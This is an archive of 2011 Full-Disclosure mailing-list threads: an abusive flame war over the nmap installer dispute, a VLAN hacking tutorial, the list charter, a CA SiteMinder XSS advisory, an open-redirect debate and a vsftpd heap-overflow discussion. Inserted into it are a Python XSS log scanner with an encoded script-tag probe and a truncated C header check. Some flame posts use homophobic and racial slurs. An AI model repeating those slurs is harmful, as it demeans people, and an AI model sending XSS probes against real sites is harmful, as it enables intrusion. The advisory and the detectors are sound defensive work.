Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial

2011-12-09 Thread xD 0x41
As I told Fy0d0r, in a case where the actual breaching of a contract
occurs, this == compensation for having, i.e., name trashed hard, coz
who knows how many new-to-nmap users are using it, and wish I had not
installed it but... oh well, I'll just have to reinstall..

And that's it, most ppl settle for this.. I have not formatted, since I
have bought, ALL of the PCs/boxes, except when on some testing boxes,
which are offline... and now, managed to hack my own 'secure' WPA2 :s,
it even has a bloody app to do it :s so, yeah, it is a big area which I
tried so hard this year and, a lot of posts about this and, see... where
is all these experts of FD now?
I mean, it is hosted by a darn vuln DB, you could easily, easily point
finger, and say well Secunia is a company and should be able to offer
*sound* advice.. anyhow, as an ex-con, I will say for this particular
case, in Fyod0r's nmap one, which is probably akin or similar to this
bug here this guy is having and NO ONE KNOWS who to even ask for
serious help... well, I will tell you who.
If it is for real, and you're serious, then you file an FBI report, THEN
ring local LEA, and explain exactly, asking of course b4 for the IT
department, who handle cyber crimes... they SHOULD patch you through
simply... but, if
hello mates!

NOT, then you need to get a LAWYER or a 'voice' and, as I have proven,
FD has NO voice in this area, yet it pretends to have a lot of it and
it has not offered this guy even advice which I was given and stuck
with, and never have spoken anything to police since, when I was
arrested, that was easy, my father said, you never 'dog' or narq on a
friend, and you never run from your problems, even if they're
mountains, because if you at least climb the mountain, you can start
breaking it down...
Now, if you want to get someone arrested, you need some SERIOUS log
activity, IRC PMs, anything which can help but, website info is always
easiest and best way.. but, like them PTC and Ponzi, I guess were
fucked hard, from ppl, many of the ppl, asking for their darn cash...
which, I swear this company bux.to is next.. but anyhow, that owner,
someone, I have nfi who, posted a complaint to online FBI and, with
logs showed that they had been ripped, now, I had like 3 bux in my
acct... and I guess now when FBI sent me papers to fill in for damages,
I claimed for the... trauma it caused me, and my family ;'(

anyhow, that's too sad to mention. I will continue onto the rest, now,
getting a LARGE group of ppl together, ANYWHERE, is a 'voice' and,
online there is so many people like Dan, Spender, kcope and many many
others who could easily make sure the scene was a lot nicer...
specially when it comes to, I mean, kernel.org being owned.. now,
what's in some of the kernels, who knows.. but if u know who did it,
then I'd expect anything...
So, why did not they get the people arrested or something then??? I
also ask myself this... but, I only think, if the person is smart
enough to stay in places where there is no treaties, then they're
gone.. you lose.. but if they're in USA, you can just report them to
FBI, but, in the nmap case, I'd have gone str8 for a mouthpiece/lawyer...
and get serious legal assistance, coz, if you were to take on cbn or,
download.com err CNET/.. they're multi-million dollar companies so it
is not gonna be easy

so, I just hope that one day FD grows a voice, because people should
not HAVE to be asking this... and googling for results is useless, you
MUST get the matter offline, and into a civil court... then you can
sue, or request things, etc, like, they're banned to use something for
some time... or anything as long as justice gets served... then we
would be knowing there IS a presence online... but... I can say now, I
am about to put a post up within next cpl of days, which is going to
blow the heads off anything WikiLeaks has done.. and... screw it, I
found this thing, so I am going to share the discovery.. and hopefully
some bank shuts me up with some bribe money... that's another way to
go, settle out-of-court session,... can be OK, depending on case.. but,
either way, you must get the people to actually be served...
That's the ONLY way you get anything done, and yea, it does maybe take
a shitload of time I guess but, I'd rather that than b scared as fuck
of nothing, because there is nothing put online to say you can and
can't do this, if that's the case then, wtf is download.com thinking?
simple.. they have a contract, they made sure there was fine print in
between some lines which are usually actually placed psychologically
so the user feels almost obliged to do what is asked of them... a lot
on the networks nowadays use psychology, and that's because there is
no body language... this is why cases are so hard to bring to trial to
start with.. no human contact makes it hard for people to arrest
someone with no fixed address... well, on the run say... I know ppl on
the run, still 10yrs, shoot police even, just 1 week ago, and still

Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial

2011-12-09 Thread tc
I bet Gordon was glad to get that email.

On Fri, Dec 9, 2011 at 5:13 PM, xD 0x41 sec...@gmail.com wrote:
 As I told Fy0d0r

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial

2011-12-09 Thread xD 0x41
Oh wow another fucking genius!

You actually know him, why aren't you a nice guy who thinks they're top
shit.. but again, as always, offering VERY little help for *gordon* are
you... dickhead, that's what makes me angry about this list.. look at
what's been done to the no.1 pentesting app EVERY1 of u has used in
some form... and, you cannot even figure out how to help the guy like,
I've seen you make more of a fucking fuss over some bs topic that
meant nothing but trolling and abuse... yet when it is time to REALLY
help, only few remain... lamers... and believe me, I don't need FD to
tell me shit, and prosec, you're fucking over... stupid gay faggots...
you and your arsehole mates at GNAA are gonna regret being the
arseholes you are today... I know, my friend there at Fibertel is
definitely.. but, don't worry, this troll will come running now
from GNAA, the Gay Nigger Association of America? right... well, that's
what the ezines say... :P

So, WHO'S GOING TO OFFER REAL DAMN ONLINE SEC HELP HERE, SIMPLE.
DON'T POINT ANY FINGERS, NOR CHANGE THE DARN TIC, IF YOU BELIEVE IN
SOMETHING, AND SOMEONE WHO IS HELPING YOU THEN GET THE FUCK UP OFF
YOUR ASS, AND AT LEAST, HELP HIM MAYBE SIGN A NICE BIGARSE LIST OF
COMPLAINEES WHO *USE THE SOFTWARE* AND, ALSO, SOME WHO HAVE
EXPERIENCED THE BAD INSTALLER... NOW, WHEN YOU MAYBE, DO SOMETHING
USEFUL, ON THE LIST HERE, LIKE, THIS IS BEING IGNORED... AND, I SEE
THAT FYODOR, AND, I DUN CARE WHAT OR WHO THE FK HE IS, GOT ME? IT IS
ABOUT ONLINE SECURITY, AND WHERE OUR VOICES ARE HEARD... IS THIS
GOING TO NOW TURN INTO A BS JOKE, OR, ARE PEOPLE GOING TO MAYBE,
ACTUALLY MAKE THE VOICE I AM ASKING YOU TO MAKE, BUT, MAKE THE NOISE,
ABOUT WHAT'S HAPPENED TO NMAP, AND, I HOPE THAT GORDON, OR WHOEVER THE
FK HE IS, CAN AT LEAST SPELL THE DAMN LAWYER'S NAME COZ, SO FAR, HE IS
RELYING ON online HELP FOR AN offline MATTER... SORRY BUT, IT STARTED
ONLINE, but THEY BREACHED CONTRACT, BRINGING IT BACK, TO CIVIL, THEN
CRIMINAL... SO, GO TELL ME SOMETHING I DON'T KNOW, AND MAYBE WE WILL
SEE SOME HELP, FOR REAL HERE...

SERIOUSLY, THINK ABOUT IT, IF THIS WAS YOUR DAMN TOOL, YOU HAD HELPED
'HAX0RS' USE, FOR 10YRS OR WHAT, AND, YOU GET NOTHING BUT, TRIED TO BE
HIDDEN AWAY AND, TOLD TO DO THIS AND THAT, BUT, NOTHING ONLINE, WILL
HELP.. SIMPLE... SO, I DUN CARE WHO TAKES MY ADVICE, I WAS, AND, DID,
A LOT OF TIME.. SO, I KNOW AT LEAST MY RIGHTS.. AND THE RIGHTS OF THE
GORDON... WHICH, WAS BREACHED.
HE COULD SUE HARD, IF HE WAS SMART, AND DID NOT LISTEN TO FAGGOTS
ONLINE TELLING HIM GOD KNOWS WHAT TO DO BUT, NOT TELLING HIM, TO GET
LEGAL AID FIRST... AND, THIS IS THE PRIME THING, ANYONE DOES IN ANY
CASE, REQUEST A LAWYER, HEY, WATCH SOME LA CRIME SHOWS, YOU MAY EVEN
LEARN, FROM HOW FKD UP USA IS,... AND HOW THE COURT SYSTEM IS, AND,
THIS WOULD STILL, EVEN IF TAKEN TO COURT, PROBABLY BE A HEADLINE, AS
IT HAS NOT HAPPENED B4... IF, PEOPLE TREAT THIS SERIOUSLY... IT DOES
NOT MATTER, ABOUT WHO OR WHAT GORDON IS.. IT MATTERS, ABOUT WHO THE
VOICE IS, WHICH WE HAVE.. AND, IF YOU WANNA BAG ME, GO RIGHT AHEAD
BUT, DON'T TELL ME, I AM WRONG.. MATE AND, IF YOU DO WELL, I WOULD
SAY, LOOK UP THE DIFFERENCES, BETWEEN A REPUBLIC, AND A DEMOCRACY,
AND, A PRESIDENTIAL STATE... AND, THE SYSTEMS, WHICH RULE THE ACTS, WHICH
FORM THE BILLS, WHICH GET PASSED IN PARLIAMENT... THIS CANNOT BE DONE,
ON AN ONLINE FORM!
WAKE THE FUCK UP, AND SERIOUSLY, LOOK AROUND, YOU'RE NOT GUILTY OF
ANYTHING RIGHT? SO, WHY NOT TRY HELP, OR, OFFER SOME ADVICE THAT'S
AT LEAST WORTHY...
YOU CAN NOW RESUME ANY BAGGING, BUT REMEMBER IT IS AT THE EXPENSE AND
TIME, THAT NMAP HAS... AND BELIEVE ME CNET IS WATCHING THIS INTENTLY...
BECAUSE THEY'RE WAITING FOR THE 'OFFER' TO SETTLE ;)
WHEN I'M WRONG, THEN SLAP ME, UNTIL THEN STFU.


On 9 December 2011 20:39, tc toughcr...@gmail.com wrote:
 I bet Gordon was glad to get that email.

 On Fri, Dec 9, 2011 at 5:13 PM, xD 0x41 sec...@gmail.com wrote:
 As I told Fy0d0r




Re: [Full-disclosure] VLAN Hacking Tutorial at InfoSec Institute

2011-12-09 Thread Memory Vandal
On Thu, Dec 8, 2011 at 8:49 PM, Adam Behnke a...@infosecinstitute.com wrote:

 Ever wanted to learn how to hack a VLAN? Here is a tutorial for all of you:

 http://resources.infosecinstitute.com/vlan-hacking/


1. ARP Attack
2. MAC Flooding Attack
3. DHCP attack
4. Spanning-Tree Protocol Attack
5. Multicast Brute Force Attack
6. Private VLAN Attack
7. VLAN Hopping Attack
8. Double-Encapsulated 802.1Q
9. Random Frame Stress Attack


Maybe I am just ignorant, but just explain how an ARP packet from one VLAN
enters another? And while you are at it, how is a MAC Flooding/DHCP attack
related to VLANs in the first place?

MemoryVandal

Re: [Full-disclosure] VLAN Hacking Tutorial at InfoSec Institute

2011-12-09 Thread Bob Dobbs
This tutorial just rehashes ancient techniques in a general way in spotty
English. The insecurity of ARP, among other issues listed, are problems on any
layer 2 network and have little to do with VLANs. ARP flooding to make a
switch go into hub mode hasn't been an issue in decent switches for quite a
few years now.

The Cisco whitepaper referenced at the bottom is worth a read though
because proper configuration is indeed important:

http://www.cisco.com/en/US/products/hw/switches/ps708/products_white_paper09186a008013159f.shtml

The @Stake VLAN security whitepaper is a good read also:

http://www.cisco.com/warp/public/cc/pd/si/casi/ca6000/tech/stake_wp.pdf

Most importantly, it says:

"The results of @stake's test sequences clearly demonstrate that edge
technologies, including tools such as VLANs on Cisco Catalyst switches,
when configured according to best-practice guidelines, can be effectively
deployed as security mechanisms."

On Thu, Dec 8, 2011 at 7:19 AM, Adam Behnke a...@infosecinstitute.com wrote:

 Ever wanted to learn how to hack a VLAN? Here is a tutorial for all of you:

 http://resources.infosecinstitute.com/vlan-hacking/




[Full-disclosure] List Charter

2011-12-09 Thread John Cartwright

[Full-Disclosure] Mailing List Charter
John Cartwright jo...@grok.org.uk
 

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing 
list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily 
concerned with security issues and their discussion.  The list is 
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.


- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface 
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to 
full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in 
either the message subject or body for details.

 
- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to 
accept submissions from non-members based on individual merit and 
relevance.

It is expected that the list will be largely self-policing, however in
special circumstances (eg spamming, misappropriation) then offending 
members may be removed from the list by the management.

An archive of postings is available at 
http://lists.grok.org.uk/pipermail/full-disclosure/.
 

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for 
instance announcement and discussion thereof, exploit techniques and 
code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is 
forbidden.  Disagreements, flames, arguments, and off-topic discussion 
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. 
Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they 
should use discretion in executing any tools or code distributed via
this list.
 

- Posting Guidelines -

The primary language of this list is English. Members are expected to 
maintain a reasonable standard of netiquette when posting to the list. 

Quoting should not exceed that which is necessary to convey context, 
this is especially relevant to members subscribed to the digested 
version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will 
preferably be short and to the point, and those containing 
'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or 
S/MIME signatures, proof-of-concept code, etc) but must not be active 
(in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to 
list postings. Offenders will be excluded from the mailing list until 
the problem is corrected.

Members may post to the list by emailing 
full-disclosure@lists.grok.org.uk. Do not send subscription/
unsubscription mails to this address, use the -request address 
mentioned above.


- Charter Additions/Changes -

The list charter will be published at 
http://lists.grok.org.uk/full-disclosure-charter.html.

In addition, the charter will be posted monthly to the list by the 
management.

Alterations will be made after consultation with list members and a 
consensus has been reached.



[Full-disclosure] CA20111208-01: Security Notice for CA SiteMinder

2011-12-09 Thread Williams, James K
CA20111208-01: Security Notice for CA SiteMinder

Issued: December 08, 2011

CA Technologies Support is alerting customers to a potential risk in 
CA SiteMinder. A vulnerability exists that can allow a malicious user 
to execute a reflected cross site scripting (XSS) attack. CA 
Technologies has issued patches to address the vulnerability.

The vulnerability, CVE-2011-4054, occurs due to insufficient 
validation of postpreservationdata parameter input utilized in the 
login.fcc form. A malicious user can submit a specially crafted 
request to effectively hijack a victim’s browser.

Risk Rating

Medium

Platform

All

Affected Products

CA SiteMinder R6 SP6 CR7 and earlier
CA SiteMinder R12 SP3 CR8 and earlier

Non-Affected Products

CA SiteMinder R6 SP6 CR8
CA SiteMinder R12 SP3 CR9

How to determine if the installation is affected

Check the Web Agent log or Installation log to obtain the installed 
release version. Note that the webagent.log file name is 
configurable by the SiteMinder administrator.

Solution

CA is issuing patches to address the vulnerability.

CA SiteMinder R6:
Upgrade to R6 SP6 CR8 or later (Expected Availability: January 2012)

CA SiteMinder R12:
Upgrade to R12 SP3 CR9 or later

CR releases can be found on the CA SiteMinder 
Hotfix/Cumulative Release page:
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={5AE61E29-C3DE-405E-9151-9EEA72D965CE}

Workaround

None

References

CVE-2011-4054 - CA SiteMinder login.fcc XSS

Acknowledgement

CVE-2011-4054 - Jon Passki of Aspect Security, via CERT

Change History

Version 1.0: Initial Release

If additional information is required, please contact CA 
Technologies Support at https://support.ca.com.

If you discover a vulnerability in CA Technologies products, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Thanks and regards,
Ken Williams, Director
CA Technologies Product Vulnerability Response Team
CA Technologies Business Unit Operations
wilj...@ca.com 

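Two checks a defender could run against this advisory, written here as an added example rather than CA's own code: a release-string comparison against the affected and non-affected lists above, and a scan of constructed access-log lines for requests to login.fcc whose postpreservationdata value carries markup. The combined-style log format and the /siteminderagent/forms/login.fcc path are assumptions, not taken from the advisory.

```python
"""Added example for the CA20111208-01 advisory above; not CA's code.

is_affected() applies the advisory's affected / non-affected lists to a
release string of the form the advisory uses ("R12 SP3 CR8"), which it
says can be read from the Web Agent or installation log.

scan_access_log() is the detection side: it flags requests to login.fcc
whose postpreservationdata parameter carries HTML/script markup instead
of the opaque form-state value the parameter normally holds. The log
format is a constructed combined-style access log, and the path
/siteminderagent/forms/login.fcc is an assumption, not from the advisory.
Only GET requests are visible this way; POST bodies are not in access logs.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# First fixed CR per major release, from the advisory:
#   R6  SP6 CR7 and earlier affected, fixed in R6 SP6 CR8
#   R12 SP3 CR8 and earlier affected, fixed in R12 SP3 CR9
FIXED_IN = {6: (6, 8), 12: (3, 9)}

RELEASE_RE = re.compile(r"\bR(\d+)\s+SP(\d+)\s+CR(\d+)\b", re.IGNORECASE)


def parse_release(text):
    """Return (R, SP, CR) as ints from text such as 'R12 SP3 CR8', or None."""
    m = RELEASE_RE.search(text)
    return tuple(int(g) for g in m.groups()) if m else None


def is_affected(text):
    """True if the release is at or below the advisory's affected ceiling,
    False if it is at or above the fixed CR, None if the string is not a
    release the advisory covers (no guessing about other major releases)."""
    rel = parse_release(text)
    if rel is None or rel[0] not in FIXED_IN:
        return None
    _, sp, cr = rel
    return (sp, cr) < FIXED_IN[rel[0]]


# Markup markers that should never appear in a legitimate
# postpreservationdata value: an HTML tag open, a javascript: URL, or a
# quoted event-handler attribute. The quote requirement keeps base64-like
# values that happen to contain "on...=" from matching.
MARKUP_RE = re.compile(
    r"<\s*/?\s*[a-z!]|javascript\s*:|\bon[a-z]+\s*=\s*[\"']", re.IGNORECASE
)

# Combined-log-style line: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_postpreservation(target):
    """Return the decoded postpreservationdata value when the request target
    is login.fcc and that value contains markup; otherwise None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/login.fcc"):
        return None
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() != "postpreservationdata":
            continue
        for value in values:
            # parse_qs already decoded once; decode again to catch
            # double-encoded values, and test both forms.
            for candidate in (value, unquote_plus(value)):
                if MARKUP_RE.search(candidate):
                    return candidate
    return None


def scan_access_log(lines):
    """Return a list of (ip, timestamp, decoded_value) for flagged requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        value = suspicious_postpreservation(m.group("target"))
        if value is not None:
            hits.append((m.group("ip"), m.group("ts"), value))
    return hits


# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    # Ordinary login: opaque form-state value, not flagged.
    '10.0.0.5 - - [09/Dec/2011:10:01:02 +0000] "GET /siteminderagent/forms/'
    'login.fcc?TARGET=%2Fapp&postpreservationdata=YWJjZGVm HTTP/1.1" 200 1532',
    # Markup in the parameter on login.fcc: flagged.
    '10.0.0.9 - - [09/Dec/2011:10:02:17 +0000] "GET /siteminderagent/forms/'
    'login.fcc?postpreservationdata=%3Cscript%3Etest%3C%2Fscript%3E HTTP/1.1" 200 1601',
    # Same marker on another path: outside this check's scope, not flagged.
    '10.0.0.9 - - [09/Dec/2011:10:03:00 +0000] "GET /search?q=%3Cscript%3E'
    ' HTTP/1.1" 404 221',
]

if __name__ == "__main__":
    for probe in ("R6 SP6 CR7", "R6 SP6 CR8", "R12 SP3 CR8", "R12 SP3 CR9"):
        print(probe, "affected" if is_affected(probe) else "not affected")
    for ip, ts, value in scan_access_log(SAMPLE_LOG):
        print(f"{ip} at {ts}: markup in postpreservationdata: {value!r}")
```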

Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial

2011-12-09 Thread Charles Morris
Okay.. I'd be happy to help you, but could you rephrase the question?

So, whos going to offer REAL DAMN ONLINE SEC HELP HERE , SIMPLE


On Fri, Dec 9, 2011 at 5:27 AM, xD 0x41 sec...@gmail.com wrote:
 Oh wow another fucking genius!




Re: [Full-disclosure] Full-Disclosure Digest, Vol 82, Issue 20

2011-12-09 Thread t0hitsugu
 Message: 10
 Date: Fri, 9 Dec 2011 21:27:14 +1100
 From: xD 0x41 sec...@gmail.com
 Subject: Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial
 To: tc toughcr...@gmail.com
 Cc: full-disclosure@lists.grok.org.uk
 Message-ID: CALCvwp7PMevN414KEcXRPA=Z06173EOv+K5=3hgmb_qow-7...@mail.gmail.com
 Content-Type: text/plain; charset=ISO-8859-1

 Oh wow another fucking genius!

 You actually know him, why aren't you a nice guy who thinks they're top
 shit.. but again, as always, offering VERY little help for *gordon* are
 you... dickhead

I'm actually starting to miss mustlive's posts after reading these kinds of
messages. Reminds me of the cheesy/ugly page defacements that always seem
to be written in Turkish or Arabic found on PHP-shelled sites, albeit
without that awful parody of rapping that usually accompanies it.

Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial

2011-12-09 Thread phocean
Oh boy! I can't believe someone can be insane to the point of writing
like that.
Netdev, do you expect that people are going to spend more than 2 secs
reading it?

What's wrong with *so many* people on this list?

Thank god there is sieve:

# anything from this address goes straight to the bit bucket
elsif anyof(
...
header :contains "From" "sec...@gmail.com"
) {
  discard;
}

-- 
phocean 0...@phocean.net

Le vendredi 09 décembre 2011 à 21:27 +1100, xD 0x41 a écrit :
 Oh wow another fucking genius!
 


Re: [Full-disclosure] VLAN Hacking Tutorial at InfoSec Institute

2011-12-09 Thread Nate Theis
 Maybe I am just ignorant, but just explain how an ARP packet from one
 VLAN enters another?


Very carefully.

Re: [Full-disclosure] Google open redirect

2011-12-09 Thread Marsh Ray
On 12/08/2011 12:37 AM, Michal Zalewski wrote:

 For time being, if you make security decisions based on onmouseover
 tooltips, link text, or anything along these lines, and do not examine
 the address bar of the site you are ultimately interacting with, there
 is very little any particular web application can do to save you: you
 are just at a significant risk wherever you go. If you take away open
 redirectors, a myriad of other, comparable ways to fool you remain,
 and can't be fixed easily.

I think reasoning based on this is subtly fallacious and it often 
contributes to disagreements between researchers and large vendors. This 
is how we got into the state of the web today: bad faith on the part of 
browser vendors.

They may be in the minority, but there *are* users out there who know 
how to look at the address bar. The security researcher knows this 
because he is one of them. I call this group the competent and 
contentious users.

Large vendors are constantly holding bad faith against their userbase. 
This may be borne out by large user studies, but I've lost count of the 
number of times I've heard actual security improvements shot down 
because typical users are presumed to be so incompetent and careless 
that they will fail to derive a significant benefit from it.

I maintain that design decisions affecting security must be driven by 
the needs of the competent and contentious user because if he cannot 
achieve effective security in using the system, then what chance has 
the typical user?!

Avoiding security improvements because they are perceived as being of 
little benefit to the typical user is wrong. Doing so gains nothing for 
the typical users, it decreases the security available to competent and 
contentious users, and worst of all it actively removes any incentives 
for the typical user to begin to take responsibility for their own 
security.

I think when the typical user gets pwned with phishing or malware he 
thinks a combination of "stupid Microsoft", "the Internet is out to get 
me", and "what did I do wrong?". The vendor implicitly answers: "you did 
nothing wrong because this is all too complicated for you to understand, 
you should install this additional product to give you better security." 
Perhaps this made sense back when the Internet was a toy and the biggest 
security risk was a limited-liability credit card number, but today we 
have whole populations in places like Iran wondering if their ass is 
going to get tortured over something they said on social media.

I think a lot of typical users today are probably wanting to move into 
that other category and we should support them in that.

- Marsh

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial

2011-12-09 Thread Andrew D Kirch
On 12/9/2011 1:39 PM, phocean wrote:
 Oh boy! I can't believe someone can be insane to the point of writing
 like that.
 Netdev, do you expect that people are going to spend more than 2 secs
 reading it?

 What's wrong with *so many* people on this list?

 Thank god there is sieve:

 elsif anyof(
  ...
  header :contains "From" "sec...@gmail.com"
  ) {
 discard;
 }

In Texas they'd have taken N3tD3v out back years ago and shot him as 
unfixably defective.

Andrew



Re: [Full-disclosure] Google open redirect

2011-12-09 Thread Michal Zalewski
 They may be in the minority, but there *are* users out there who know how to
 look at the address bar. The security researcher knows this because he is
 one of them. I call this group the competent and contentious users.

Sure. And that group is sort of safe when faced with open redirectors,
mouseover tooltips, etc - well, modulo funny corner cases like this:

http://lcamtuf.coredump.cx/switch/

...or:

http://lcamtuf.coredump.cx/switch/index2.html

I have seen "most users don't understand X anyway" as an argument
against fixing X in the browser several times before, and I think
that's wrong; but I'm not sure this is applicable here.

/mz



Re: [Full-disclosure] Google open redirect

2011-12-09 Thread Valdis . Kletnieks
On Fri, 09 Dec 2011 14:31:15 CST, Marsh Ray said:

 They may be in the minority, but there *are* users out there who know
 how to look at the address bar. The security researcher knows this
 because he is one of them. I call this group the competent and
 contentious users.

Did you mean contentious (argumentative, difficult)?  Or were you thinking of
conscientious (dedicated to a cause)? ;)

What vendors *really* hate are users who are both. ;)



Re: [Full-disclosure] Google open redirect

2011-12-09 Thread Dave

On 09/12/2011 20:31, Marsh Ray wrote:
 On 12/08/2011 12:37 AM, Michal Zalewski wrote:

 For time being, if you make security decisions based on onmouseover
 tooltips, link text, or anything along these lines, and do not examine
 the address bar of the site you are ultimately interacting with, there
 is very little any particular web application can do to save you: you
 are just at a significant risk wherever you go. If you take away open
 redirectors, a myriad of other, comparable ways to fool you remain,
 and can't be fixed easily.


Whilst I agree with what you have said, the majority of computer users today
are just consumers. They expect their nice new shiny Win 7 laptop to behave
just like their washing machine. Push a button and it does what is expected;
they don't expect to have to understand how it works, nor do they expect it
to do bad things when they are not looking. Occasionally a scam may make
headline news, but the attention span and memory of the average consumer is
measured in days or weeks, not a lifetime.

The marketing blurb from software providers, be that OS or application, does
nothing to dispel this expectancy. In fact the marketing blurb does its best
to hide any possibility of detriment from using the product from the user.

The user does blame MS or the Internet and very rarely their own incompetence
in using the computing device. Why? Because all the marketing blurb for such
devices avoids any indication that using said device may result in the
compromise of identity or bank account.

Where does the advertising for computing devices state that the system is
flawed? Nowhere. The consumer is given this image of a wonderful device doing
wonderful things. A device that would never bend them over when they least
expect it.

The solution is either make the Internet and computers totally secure, or
educate the user that the system, be that OS, application or Internet, is
broken and they need to be on their guard against what may happen for every
click they make.

I like to think I am somewhat competent. The last virus I had, the last
compromise I faced, was the Saddam virus on my Amiga. My confidence doesn't
make me feel that I will never be owned or compromised. There are far smarter
people out there than I. The average consumer does not think this way; they
are drunk on the Kool-Aid.


[Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)

2011-12-09 Thread HI-TECH .
-- Forwarded message --
From: HI-TECH . isowarez.isowarez.isowa...@googlemail.com
Date: 10 December 2011 00:44
Subject: Re: [Full-disclosure] VSFTPD Remote Heap Overrun (low severity)
To: Ramon de C Valle rcva...@redhat.com


Hi Ramon,
Frankly I didn't look into the possibility to exploit this vulnerability,
so I do not know if it is easy or hard to exploit. As you outlined,
it is difficult; during your audit you did not manage to trigger a
function pointer call? I guess not.
I am not much into exploiting heap based overruns in the old times fashion.
BTW both freebsd and pure-ftpd load locale files (strace it and you
will see) from /usr;
these locale files are used for the ftp responses to make them written
in an international language.
FreeBSD ftpd in conjunction with the locale files loading will SIGSEGV
(EIP overwrite)
due to a strcpy in locale responses in a special codepath. I did not
find a way to exploit Pure-FTPD through this
locale loading though, because Pure-FTPD is very restrictive in many ways even
on response lines, but there might be a vuln there too. (I don't
remember if locale loading was only
on FreeBSD or also on Linux or also in vsftpd, since the libc behaves
very differently in BSD/glibc/eglibc etc.)

Regards,

Kingcope


On 9 December 2011 19:32, Ramon de C Valle rcva...@redhat.com wrote:
 This is afaik a patched CVE in Linux glibc [1] which can be triggered through
 the very secure ftp daemon [2] so it will only work on older linux distros.
 Be aware that vsftpd has privilege separation built in so this bug
 will not yield a root shell.
 It could yield root only in conjunction with a linux kernel vulnerability
 because the attacker
 will not be able to break the chroot without being root.
 This bug has a low severity because it's hard to exploit.
 Linux systems without patched glibc are vulnerable even if the latest
 version vsftpd-2.3.4 is installed.
 The bug is in the glibc timezone code. vsftpd loads timezone files
 from /usr [3]. If the attacker is inside a chroot
 he can easily create this directory and the timezone file and trigger
 the heap overrun.

 A Debugging Session illustrating the bug can be found on youtube:
 http://www.youtube.com/watch?v=KRCuozBM_dQ
 I did a brief analysis of this issue, and it seems vsftpd does not add 
 anything to this as an attack vector. Although we can control the size of 
 the chunk to be allocated (i.e. transitions), and can arbitrarily allocate 
 this chunk from fast bins, the main arena, or eventually, a new mmap()'ed 
 heap, we do not have any control over when its adjacent chunks are allocated, 
 freed, the type of their contents, when they will be used, how they will be 
 used, and if they will be used and useful at all. In addition, the data used 
 to overflow (i.e. transition times) are read and decoded as 4-byte integers 
 in network (big-endian) byte order, which increases the difficulty in faking 
 any structure, such as the adjacent allocated chunk, to, at least, get outside 
 of glibc scope after the overflow, since all return paths from __tzfile_read 
 free our controlled previously allocated chunk.

 Do you or anyone know a way to potentially exploit this vulnerability?


 Cheers!
 Thanks,


[1] http://dividead.wordpress.com/tag/heap-overflow/
[2] https://security.appspot.com/vsftpd.html
[3] For example /usr/share/zoneinfo/UTC-01:00

/Kingcope


 --
 Ramon de C Valle / Red Hat Security Response Team
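The size computation that Kingcope and Ramon describe above is driven entirely by the counts in the TZif header. As an added example (not glibc's or vsftpd's code), here is a checked reader for the v1 header that bounds each count and refuses a header whose declared sizes would wrap; the 2^20 limit, the helper names and the constructed headers are all assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hardened reader for the counts in a TZif v1 header (constructed example, not
 * glibc's or vsftpd's code). Offsets follow struct tzhead: magic[4] version[1]
 * reserved[15], then ttisgmtcnt, ttisstdcnt, leapcnt, timecnt, typecnt and
 * charcnt as big-endian 32-bit integers. */
#define TZIF_HDR_LEN   44
#define TZIF_MAX_COUNT (1u << 20)  /* assumed sanity bound; far above any real zone */

static uint32_t get_be32(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}
static void put_be32(unsigned char *p, uint32_t v) {
    p[0] = v >> 24; p[1] = v >> 16; p[2] = v >> 8; p[3] = v;
}
/* Accumulate b into *acc, failing instead of wrapping around. */
static int add_checked(size_t *acc, size_t b) {
    if (b > SIZE_MAX - *acc) return 0;
    *acc += b;
    return 1;
}
/* Bytes needed for the data after the header, or 0 if the header is
 * malformed or the size arithmetic would overflow. */
size_t tzif_checked_size(const unsigned char *hdr, size_t hdr_len) {
    if (hdr_len < TZIF_HDR_LEN || memcmp(hdr, "TZif", 4) != 0) return 0;
    uint32_t isgmtcnt = get_be32(hdr + 20), isstdcnt = get_be32(hdr + 24);
    uint32_t leapcnt  = get_be32(hdr + 28), timecnt  = get_be32(hdr + 32);
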